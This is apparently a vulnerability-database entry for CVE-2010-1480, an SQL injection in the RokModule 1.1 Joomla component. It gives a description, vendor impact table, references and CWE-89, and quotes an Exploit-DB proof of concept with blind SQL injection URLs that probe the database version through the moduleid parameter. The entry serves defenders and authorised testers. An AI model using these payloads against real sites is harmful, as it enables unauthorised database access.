CVE-2010-1480
Description
SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the module parameter to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
==================================================================================================================
[o] Joomla Component RokModule Blind SQLi [moduleid] Vulnerability
Software : com_rokmodule version 1.1
Vendor : http://www.rockettheme.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
==================================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=[BSQLi]
[o] PoC
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
==================================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
==================================================================================================================
[o] April 11 2010 - GMT +07:00 Jakarta, Indonesia
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| rockettheme | com_rokmodule | 1.1 | |
| joomla | joomla\! | | |
References
- http://secunia.com/advisories/39255
- http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/download
- http://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-released
- http://secunia.com/advisories/39255
- http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/download
- http://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-released
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.